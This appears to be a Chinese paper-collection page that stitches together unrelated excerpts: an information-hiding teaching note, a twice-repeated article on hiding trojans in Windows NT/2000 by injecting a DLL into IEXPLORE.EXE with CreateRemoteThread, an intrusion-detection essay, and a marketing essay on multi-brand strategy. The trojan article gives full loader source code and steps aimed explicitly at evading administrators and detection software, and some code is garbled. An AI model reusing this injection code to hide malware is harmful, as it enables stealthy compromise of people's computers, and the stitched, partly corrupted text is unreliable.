以信息隐藏技术为例,该部分内容在整个课程中非常重要,它将一些保密或重要的信息隐藏到另外一个可以公开的媒体之中,如把指定的信息隐藏于数字化的图像、声音或文本当中,充分利用人们的“所见即所得”的心理,来迷惑恶意的攻击者。近几年来,信息隐藏技术不断发展,越来越多地应用在生活中,如隐写术、数字水印、数字指纹、隐藏信道、阈下信道、低截获概率和匿名通信等,是目前较热的话题。[3,4]

在课程中这部分内容是整个课程的重点、难点之一,教学过程采用了比较、举例等方法,课时分配――理论教学:讨论:实验=1:1:2,理论讲授以图1中的知识框架为主线,算法原理及实现方法,讨论和实验结合中软吉大的网络信息安全系统进行教学。综合起来可以把这部分内容分为以下几部分。

1.信息隐藏位图法

位图法目前使用越来越少,但作为一种基础信息隐藏方法,仍有较高的教学应用价值。该方法作为课程中的一个基本知识点,要求学生掌握它的基本原理,并能通过一个案例,掌握主要运算过程如下:

例如,一幅24位BMP图像,文件头和图像数据由54字节组成,文件头不能隐藏信息,从第55字节开始为图像数据部分,这部分可以隐藏信息。图像数据部分是由一系列的8位二进制数所组成,因为每个8位二进制数中“1”的个数只有奇数或偶数两种可能性,因此若一个字节中“1”的个数为奇数,则称该字节为奇性字节,用“1”表示;若一个字节中“1”的个数为偶数,则称该字节为偶性字节,用“0”表示。我们用每个字节的奇偶性来表示隐藏的信息。

设一段24位BMP文件的数据为:01100110,00111100,10001111,00011010,00000000,10101011,00111110,10110000,则其字节的奇偶排序为:0,0,1,1,0,1,1,1.现在需要隐藏16进制信息4F,由于4F转化为8位二进制为01001111,将这两个数列相比较,发现第2,3,4,5位不一致,于是对这段24位BMP文件数据的某些字节的奇偶性进行调制,使其与4F转化的8位二进制相一致:第2位:将00111100变为00111101,则该字节由偶变为奇;第3位:将10001111变为10001110,则该字节由奇变为偶;第4位:将00011010变为00011011,则该字节由奇变为偶;第5位:将00000000变为00000001,则该字节由偶变为奇。

经过变化,8个字节便隐藏了一个字节的信息,这样就能很好地将信息隐藏在位图中了。当然逆向提取隐藏信息需要花费更长的时间。

2.LSB水印提取

LSB(最低有效位)算法是在位图法的基础上将输入的信号打乱,并按照一定的分配规则使嵌入的信息能够散布于图像的所有像素点上,增加破坏和修改水印的难度。水印信号嵌入模型如图2,水印信号检测模型如图3。

3.DCT变换域算法

DCT变换域算法是这一类算法的总称,在它下面的具体的算法会有一些不同。下面介绍一种基于模运算的数字水印算法。该方法将水印作为二值图像(每一像元只有两种可能的数值或者灰度等级状态的图像)进行处理,依据图像在进行DCT变换后系数的统计来选取适当的阈值,通过模处理加入水印。此算法的特点是在水印检测时不需要原始图像(如图4)。

模拟主动水印攻击教学过程

通过基础知识的学习,学生对信息隐藏技术已经有了一定的了解,为了加深记忆,使知识应用得更好,在这部分课程最后增加了一个模拟主动水印攻击的教学模块。该模块主要应用前期的知识完成。常见的水印攻击方法有:移去攻击、几何攻击、密码攻击、协议攻击(如图5)。

通过模拟攻击实验,学生对数字隐藏技术有了更深的了解,对各种算法增加了兴趣。并在课堂上针对结果展开讨论。下页图6为实验模拟攻击后的有效结果之一。

选用LSB或者DCT进行水印攻击,测试可以显示如下页图6效果。

教学成效

通过对课程中信息隐藏技术教学的改进,学生对比较难懂的数字水印部分内容有了更深一步的了解。通过改革,不仅充分调动了学生的积极性,培养了自学能力,开发了创新能力,还锻炼了学生的团队合作意识和实践能力。攻击中涉及算法的选择、操作的选择、速度的快慢,学生都能通过团队合作完成。学生在实践过程中强烈感受到了成功感和自信感。

结束语

本文以信息隐藏技术内容教学为例,阐述了三种不同的信息隐藏技术的基本知识点,分析了它们之间的关联性和区别,提高了学生的团队合作能力和创新思维的培养,加强了学生的学习兴趣。此外,本模式将教学与科研能力培养相融合,更多地引发了学生的思考。该教学模式可推广到其他课程中。

参考文献:

[1]李继芳,奚李峰,董晨.IPR―CDIO环境的计算机工程教育研究[J].计算机教育,2009(18).

[2]李继芳,奚李峰,殷伟凤,高昆.基于合作式学习的计算机导论课程教学[J].计算机教育,2008(10).

篇(5)

关键字进程线程木马动态链接库

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了WindowsNT/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现WindowsNT/2000系统中进程的隐藏。

1基本原理

在WIN95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在WindowsNT/2000中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过WindowsNT/2000的任务管理器,WindowsNT/2000的任务管理器均能轻松显示出木马进程,难道在WindowsNT/2000下木马真的再也无法隐藏自己的进程了?我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和SOCKET已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在WindowsNT/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2实现方法

为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是DynamicLinkLibrary(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL,假设我们编写了一个木马DLL,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马DLL,如果那个进程是可信进程,(例如浏览器程序IEXPLORE.EXE,没人会怀疑它是木马吧?)那么我们编写的DLL作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3实施步骤

1)用Process32Next()函数找到宿主进程,获取宿主进程ID,并用

OpenProcess()函数打开宿主进程。

2)用VirtualAllocEx()函数分配远程进程地址空间中的

内存。

3)用WriteProcessMemory()函数将待隐藏的DLL的路径名。

4)拷贝到步骤二已经分配的内存中。

5)用GetProcAddress()函数获取LoadlibraryA()函数的实地址(在kernel32.dll中)。

6)用CreateRemoteThread()函数在远程进程中创建一个线程。

7)它调用正确的LoadlibraryA()函数。

8)为它传递步骤二中分配的内存地址。

4具体实例

下面是在C++Builder4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//该头文件包涵了进程操作的API函数

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隐藏的DLL文件名

HANDLEhProcessSnap=NULL;//进程快照句柄

HANDLEhRemoteProcess;//远程进程句柄

LPVOIDpszLibFileRemote;//远程进程中分配给文件名的空间

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放远程线程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打开进程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失败返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//获取第一个进程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主进程,以IEXPLORE.EXE为例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//获取下一个进程

}

else

{

MessageBox(NULL,"取第一个进程失败","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打开远程进程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假设hide.dll是待隐藏的进程

intcb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申请存放文件名的空间

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名写入申请的空间

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//获取动态链接库函数地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//创建远程线

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//关闭远程线程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//关闭进程快照

}

该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试:

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//获取当前进程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

篇(6)

关键字进程线程木马动态链接库

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了WindowsNT/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现WindowsNT/2000系统中进程的隐藏。

1基本原理

在WIN95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在WindowsNT/2000中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过WindowsNT/2000的任务管理器,WindowsNT/2000的任务管理器均能轻松显示出木马进程,难道在WindowsNT/2000下木马真的再也无法隐藏自己的进程了?我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和SOCKET已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在WindowsNT/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2实现方法

为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是DynamicLinkLibrary(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL,假设我们编写了一个木马DLL,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马DLL,如果那个进程是可信进程,(例如浏览器程序IEXPLORE.EXE,没人会怀疑它是木马吧?)那么我们编写的DLL作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3实施步骤

1)用Process32Next()函数找到宿主进程,获取宿主进程ID,并用

OpenProcess()函数打开宿主进程。

2)用VirtualAllocEx()函数分配远程进程地址空间中的

内存。

3)用WriteProcessMemory()函数将待隐藏的DLL的路径名。

4)拷贝到步骤二已经分配的内存中。

5)用GetProcAddress()函数获取LoadlibraryA()函数的实地址(在kernel32.dll中)。

6)用CreateRemoteThread()函数在远程进程中创建一个线程。

7)它调用正确的LoadlibraryA()函数。

8)为它传递步骤二中分配的内存地址。

4具体实例

下面是在C++Builder4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//该头文件包涵了进程操作的API函数

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隐藏的DLL文件名

HANDLEhProcessSnap=NULL;//进程快照句柄

HANDLEhRemoteProcess;//远程进程句柄

LPVOIDpszLibFileRemote;//远程进程中分配给文件名的空间

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放远程线程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打开进程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失败返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//获取第一个进程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主进程,以IEXPLORE.EXE为例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//获取下一个进程

}

else

{

MessageBox(NULL,"取第一个进程失败","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打开远程进程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假设hide.dll是待隐藏的进程

intcb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申请存放文件名的空间

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名写入申请的空间

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//获取动态链接库函数地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//创建远程线

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//关闭远程线程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//关闭进程快照

}

该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试:

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//获取当前进程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

篇(7)

 

信息网络和安全体系是信息化健康发展的基础和保障。但是,随着信息化应用的深入、认识的提高和技术的发展,现有信息网络系统的安全性建设已提上工作日程。

入侵攻击有关方法,主要有完成攻击前的信息收集、完成主要的权限提升完成主要的后门留置等,下面仅就包括笔者根据近年来在网络管理中有关知识和经验,就入侵攻击的对策及检测情况做一阐述。论文大全。

对入侵攻击来说,扫描是信息收集的主要手段,所以通过对各种扫描原理进行分析后,我们可以找到在攻击发生时数据流所具有的特征。

1、利用数据流特征来检测攻击的思路

扫描时,攻击者首先需要自己构造用来扫描的IP数据包,通过发送正常的和不正常的数据包达到计算机端口,再等待端口对其响应,通过响应的结果作为鉴别。我们要做的是让IDS系统能够比较准确地检测到系统遭受了网络扫描。考虑下面几种思路:

(1)特征匹配

找到扫描攻击时数据包中含有的数据特征,可以通过分析网络信息包中是否含有端口扫描特征的数据,来检测端口扫描的存在。如UDP端口扫描尝试:content:“sUDP”等。

(2)统计分析

预先定义一个时间段,在这个时间段内如发现了超过某一预定值的连接次数,认为是端口扫描。

(3)系统分析

若攻击者对同一主机使用缓慢的分布式扫描方法,间隔时间足够让入侵检测系统忽略,不按顺序扫描整个网段,将探测步骤分散在几个会话中,不导致系统或网络出现明显异常,不导致日志系统快速增加记录,那么这种扫描将是比较隐秘的。这样的话,通过上面的简单的统计分析方法不能检测到它们的存在,但是从理论上来说,扫描是无法绝对隐秘的,若能对收集到的长期数据进行系统分析,可以检测出缓慢和分布式的扫描。

2、检测本地权限攻击的思路

行为监测法、文件完备性检查、系统快照对比检查是常用的检测技术。虚拟机技术是下一步我们要研究的重点方向。

(1)行为监测法

由于溢出程序有些行为在正常程序中比较罕见,因此可以根据溢出程序的共同行为制定规则条件,如果符合现有的条件规则就认为是溢出程序。行为监测法可以检测未知溢出程序,但实现起来有一定难度,不容易考虑周全。行为监测法从以下方面进行有效地监测:一是监控内存活动,跟踪内存容量的异常变化,对中断向量进行监控、检测。二是跟踪程序进程的堆栈变化,维护程序运行期的堆栈合法性。以防御本地溢出攻击和竞争条件攻击。

监测敏感目录和敏感类型的文件。对来自www服务的脚本执行目录、ftp服务目录等敏感目录的可执行文件的运行,进行拦截、仲裁。对这些目录的文件写入操作进行审计,阻止非法程序的上传和写入。监测来自系统服务程序的命令的执行。对数据库服务程序的有关接口进行控制,防止通过系统服务程序进行的权限提升。论文大全。监测注册表的访问,采用特征码检测的方法,阻止木马和攻击程序的运行。

(2)文件完备性检查

对系统文件和常用库文件做定期的完备性检查。可以采用checksum的方式,对重要文件做先验快照,检测对这些文件的访问,对这些文件的完备性作检查,结合行为检测的方法,防止文件覆盖攻击和欺骗攻击。

(3)系统快照对比检查

对系统中的公共信息,如系统的配置参数,环境变量做先验快照,检测对这些系统变量的访问,防止篡改导向攻击。

(4)虚拟机技术

通过构造虚拟x86计算机的寄存器表、指令对照表和虚拟内存,能够让具有溢出敏感特征的程序在虚拟机中运行一段时间。论文大全。这一过程可以提取与有可能被怀疑是溢出程序或与溢出程序相似的行为,比如可疑的跳转等和正常计算机程序不一样的地方,再结合特征码扫描法,将已知溢出程序代码特征库的先验知识应用到虚拟机的运行结果中,完成对一个特定攻击行为的判定。

虚拟机技术仍然与传统技术相结合,并没有抛弃已知的特征知识库。虚拟机的引入使得防御软件从单纯的静态分析进入了动态和静态分析相结合的境界,在一个阶段里面,极大地提高了已知攻击和未知攻击的检测水平,以相对比较少的代价获得了可观的突破。在今后相当长的一段时间内,虚拟机在合理的完整性、技术技巧等方面都会有相当的进展。目前国际上公认的、并已经实现的虚拟机技术在未知攻击的判定上可达到80%左右的准确率。

3、后门留置检测的常用技术

(1)对比检测法

检测后门时,重要的是要检测木马的可疑踪迹和异常行为。因为木马程序在目标网络的主机上驻留时,为了不被用户轻易发现,往往会采取各种各样的隐藏措施,因此检测木马程序时必须考虑到木马可能采取的隐藏技术并进行有效地规避,才能发现木马引起的异常现象从而使隐身的木马“现形”。常用的检测木马可疑踪迹和异常行为的方法包括对比检测法、文件防篡改法、系统资源监测法和协议分析法等。

(2)文件防篡改法

文件防篡改法是指用户在打开新文件前,首先对该文件的身份信息进行检验以确保没有被第三方修改。文件的身份信息是用于惟一标识文件的指纹信息,可以采用数字签名或者md5检验和的方式进行生成。

(3)系统资源监测法

系统资源监测法是指采用监控主机系统资源的方式来检测木马程序异常行为的技术。由于黑客需要利用木马程序进行信息搜集,以及渗透攻击,木马程序必然会使用主机的一部分资源,因此通过对主机资源(例如网络、CPU、内存、磁盘、USB存储设备和注册表等资源)进行监控将能够发现和拦截可疑的木马行为。

(4)协议分析法

协议分析法是指参照某种标准的网络协议对所监听的网络会话进行对比分析,从而判断该网络会话是否为非法木马会话的技术。利用协议分析法能够检测出采取了端口复用技术进行端口隐藏的木马。

参考文献:

[1]张普兵,郭广猛,廖成君.Internet中的电子欺骗攻击及其防范[J].计算机应用,2001,21(1):32-34.

[2]苏一丹,李桂.基于DFA的大规模入侵建模方法研究[J].计算机工程与应用,2003,39(28).

篇(8)

二、多品牌策略的优点

多品牌策略在实践中屡见不鲜,多品牌策略的优点很多,主要有:

(一)多品牌具有较强的灵活性。没有一种产品是十全十美的,也没有一个市场是无懈可击的。浩瀚的市场海洋,为企业提供了许多平等竞争的机会,关键在于企业能否及时抓住机遇,在市场上抢占一席之地。见缝插针就是多品牌灵活性的一种具体表现。

(二)多品牌能充分适应市场的差异性。消费者的需求是千差万别的、复杂多样的,不同的地区有不同的风俗习惯;不同的时间有不同的审美观念;不同的人有不同的爱好追求,等等。

(三)多品牌有利于提高产品的市场占有率。多品牌策略最大的优势便是通过给每一品牌进行准确定位,从而有效地占领各个细分市场。如果企业原先单一目标顾客范围较窄,难以满足扩大市场份额的需要,此时可以考虑推出不同档次的品牌,采取不同的价格水平,形成不同的品牌形象,以抓住不同偏好的消费者。

多品牌策略不仅仅是企业满足消费需求的被动选择,也是企业制定竞争战略的主动选择。对市场攻击者和挑战者而言,其抢占市场的一个惯用伎俩就是发展出一个专门针对某一细分市场的品牌来逐渐蚕食;对市场领导者而言,与其坐等对手来占据某一细分市场,不如自己先发展出一个品牌去抢占,实施有效防御,从而锁定不同目标消费群。

三、多品牌策略的不足

当然,每个策略都不是完美的,多品牌策略也存在着缺陷,企业若在同一市场中发展多个品牌,成本成长的速度会比收入还快,在零售商与内部资源分配上,也会遇上复杂的管理难题。在推出一项品牌之前,企业通常会比较它们预期会产生的额外收入以及行销该品牌的成本。这类成本通常超乎主管的想像,因为“多品牌”策略有一项严重的限制;它会因不具规模经济而受害。一家公司会因在一个市场中推出数个品牌,而招致隐藏的成本,而且在事情发展超过某一点之后,就会有绑手绑脚之苦。

尽管隐藏成本的累积速度相当缓慢,但如果公司将太多品牌塞入这个产品类别,隐藏的成本就出现了。隐藏成本有四种可能呈现方式:

(一)成本重叠。当企业无法透过独一无二的方式为每一个品牌进行定位时,成本就会攀升。通常,品牌会在特色、属性或价格方面出现重叠,只是企业主管未意识到罢了。这些品牌彼此竞争的程度,和它们与对手品牌之间的竞争程度不相上下,而且最后通常演变为彼此互相吞噬。如此一来,公司成本的上升速度会比收入成长速度还快。

(二)效率不彰。很多公司已经运用自己的品牌开创出几项显然有利可图、但规模很小的利基。缺乏数量上的优势并未让他们的行销人员担心,因为他们力图达成的是整个品牌组合的销售最大化,而不是个别品牌的销售最大化。但是,这类的公司迟迟才了解,维持一大群品牌(而且每项品牌的运营规模都相对较小)的成本,相对而言,比推销几项大品牌的成本要高。例如,要制造各式各样的产品,工产方面需要大量的装备成本以及较长的机器停工时间,从而会导致较高的生产成本。

(三)零售商利润高昂。当企业推出多项品牌时,要为这些品牌取得零售上架空间,上架成本会高得让你不得不打退堂鼓。大型零售厂商,如美国的沃尔玛百货与欧洲的家乐福,一般在每项产品分类中只将前两大或前十大品牌上架。零售商运用领导品牌吸引顾客上门,但随后就向购物者推销自有品牌。

(四)管理难度加大。“多品牌”策略需要进行协调,包括从产品创新与包装改变,到经销商关系与零售商促销的。大型的品牌组合也需要经常进行价格变动与库存调整,这些工作会消耗所费不赀的管理资源。

此外,品牌扩增为企业带来最大成本的时候,不是现在,而是在未来。那些在市场中具有大型品牌组合的公司,经理人不断挂念在心的,往往是品牌之间的经费配置,而不是公司前途或有关竞争对手的问题。这类冲突的阴影常使企业组织挥之不去,让他们在面临更加专注的对手竞争时,显得脆弱不堪。

四、多品牌策略的应用

(一)明确品牌定位。定位意味着牺牲,意味着有所不为,而企业的扩张又希望无所不为。企业在完成资本积累开始对外扩张的过程中,若坚持统一品牌策略,让所有开发的新产品都套用原品牌,就会面临两难选择:若进行品牌延伸,尽管极为谨慎行事,采取了防范措施,但也可能出现品牌形象淡化、每一种产品都缺乏个性而被对手各个击破的风险;若放弃某些领域的品牌延伸,则意味着必须放弃一部分市场。要解决这一难题,一个可行的办法就是要采取产品定位的多品牌策略。

(二)建立内在相关性。品牌管理涉及到采购、生产、营销、财务、人力等各个环节。对多品牌企业而言,不能只关注单个品牌,而必须注意同一系列品牌之间的相互关联和影响。内在相关性主要是指,在实施多品牌策略时必须能够在几个品牌之间形成良好的资源整合和共享机制。任何一个企业的资源和精力都是有限的,因此为了充分利用企业的内外资源,可以成立完善的研发、采购公共平台,同时在渠道资源方面也实现良好的品牌互动和共享,并以完全不同的渠道策略来实现品牌间的良性竞争。品牌之间的高效整合与共享是欧莱雅取得成功的关键,其主要体现在技术和渠道这两个兼容性极强的方面。在技术方面,欧莱雅尽量发挥技术平台的相关效应。

(三)发挥企业品牌对多品牌策略的杠杆作用。多品牌策略中,品牌关系的管理还包括企业品牌和产品品牌之间关系的管理。企业品牌用于维护企业整体形象,对现有和潜在的员工来说,它是一种激励;对投资者而言,它意味着信心;对于产品品牌,它提供的是承诺。企业品牌代表的是企业的外部形象,对产品品牌有很强的杠杆作用。欧莱雅深知企业品牌的重要性,将其营销推广跨越个别产品线的产品品牌宣传,将光芒聚焦到企业品牌上来,最终形成一股激化不同产品品牌的能量。

综上所述,企业要使用多品牌策略进行市场竞争,需要注意多方面的内容。首先在品牌定位时要注意各品牌之间的关系,使各个品牌互相不冲突,并且协调各个品牌之间的内在关系,找出重点培育的品牌,以重点品牌促进其他品牌的发展,同时又需要防止那些做得不成功的品牌影响重点品牌的价值。在培育各个品牌的同时注意隐藏成本的增加,尽量减少隐藏成本,避免因为隐藏成本拖垮了各个品牌的扩张,做到了这些才能使企业的多个品牌健康地发展,使企业在竞争中获胜。

论文关键词:多品牌;品牌定位;品牌关系

